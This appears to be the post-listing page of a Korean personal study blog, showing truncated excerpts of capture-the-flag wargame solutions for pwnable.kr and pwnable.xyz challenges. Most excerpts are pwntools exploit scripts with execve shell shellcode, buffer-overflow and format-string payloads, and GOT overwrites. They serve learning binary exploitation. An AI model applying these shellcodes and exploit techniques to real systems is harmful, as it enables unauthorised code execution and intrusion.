대충공부한거적어두는블로그

from pwn import * p = remote("pwnable.kr", 9034) # p = process("./loveletter") # protect에 의해 253bytes+';' => 253bytes+'\xe2\x99\xa5\x00' : 1byte overflow pay = 'cat flag ' pay += 'A'*(253-len(pay)) p.sendline(pay+";") p.interactive() int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[256]; // [esp+10h] [ebp-114h] BYREF int v5; // [esp+110h] [ebp-14h] int v6; // [esp+114h..

from pwn import * p = remote("pwnable.kr", 9011) # p = process("./echo2") e = ELF("./echo2") # shellcode = "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" poprbpret = "\x5d\x5d\xc3" free_got = e.got['free'] # 0x6..

#include // 23byte shellcode from http://shell-storm.org/shellcode/files/shellcode-827.php char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; void shellcode(){ // a buffer we are about to exploit! // [ebp-0x1c] char buf[20]; // prepare shellcode on executable stack! strcpy(buf, sc); // overwrite return address! // [ebp+0x4] = buf+32 *(i..

from pwn import * p = remote("pwnable.kr", 9010) # p = process("./echo1") e = ELF("./echo1") jmp_rsp = b"\xff\xe4" # asm('jmp rsp') id = e.symbols['id'] shell_23 = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" shell_31 = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"..

from pwn import * argvs = ["" for i in range(2)] # DUMMY + call_execve_addr + action_addr + NULL_addr + NULL_addr pay = b'A'*0x20 + p32(0x5561676a) + p32(0x556b6534) + p32(0x55564a36)*2 argvs[1] = pay p = process(executable="/home/ascii_easy/ascii_easy", argv=argvs) p.interactive() #include #include #include #include #include #include #define BASE ((void*)0x5555e000) int is_ascii(int c){ // 0x80..

from pwn import * shellcode = '\x90'*0x1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" # 0xff8~ 영역에 매핑된다 argvs = [ p32(0xffdddfff) ] env = {} argvs.append(shellcode) for i in range(0x100): env[str(i)] = shellcode while True: p = process(executable="/home/tiny_easy/tiny_easy", env=env, argv=argvs) try: p.sendline("ls") p.recv(100) exce..

from pwn import * s = ssh(user='fsb', host='pwnable.kr', port=2222, password='guest') p = s.process(executable='/home/fsb/fsb') # p = process("./fsb") # key = 0x0804a060 = 134520928 # key+4 = 134520932 p.sendafter("(1)\n", "%134520928c%14$n") # esp+0x50에 key 주소 p.sendafter("(2)\n", "%134520932c%15$n") # esp+0x54에 key+4 주소 p.sendafter("(3)\n", "A"*15+"%20$n") # 하위 4byte에 0xf p.sendafter("(4)\n", ..

#!/bin/bash for i in {1..100} do output=$(timeout 5s python my_python_file.py) if [[ $output == *"FLAG{"*"}"* ]]; then flag=$(echo "$output" | grep -o "FLAG{[^}]*}") echo "FLAG FOUND: $flag" exit 0 else echo "FLAG NOT FOUND." fi done echo "FLAG NOT FOUND in 100 tries"​ from pwn import * p = remote("svc.pwnable.xyz", 30017) # p = process("./challenge") p.sendlineafter("Message: ", "minseo") cnry ..

from pwn import * p = remote("svc.pwnable.xyz", 30014) # p = process("./challenge") # 0x408 byte 채워야하므로 시간절약 위해 맨처음에 최대한 읽어놓자 p.sendafter("> ", "1") p.sendafter("data: ", 'A'*127) while True: p.sendafter("> ", "2") tmp = p.recvuntil("chars: ") num = int(tmp[8:-8]) if num>=14: p.send("A"*8) break if num!=0: p.send("\x00") p.sendafter("> ", "3") p.recvuntil('A'*135) win_addr = u64(p.recvline()[:-1..

# exploit 1 (using OOB) from pwn import * p = remote("svc.pwnable.xyz", 30013) # p = process("./challenge") e = ELF("./challenge") p.recvuntil("Name: ") p.send('\x00') p.recvuntil("Desc: ") p.sendline("hahaha") for i in range(8): p.sendlineafter("> ", "1") p.recvuntil("Name: ") p.send("\x00") p.sendlineafter("> ", "1") p.sendlineafter("Name: ", 'A'*0x80+'\x30\x20\x60') # strlen@got p.sendlineaft..